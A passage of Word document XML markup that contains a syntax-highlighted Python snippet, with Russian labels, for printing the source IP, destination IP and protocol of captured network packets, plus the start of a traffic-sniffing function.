        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6733BB35" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1CFBF" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dst_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABB704" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.sprintf(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"%IP.proto%"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E98EC1E" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Пакет</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dst_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Протокол</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA728AB" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D00601" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Запуск сниффера для анализа трафика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583450E" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD0B1F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E12809">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>трафика</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>..."</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A0605B" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="005F1B9E" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
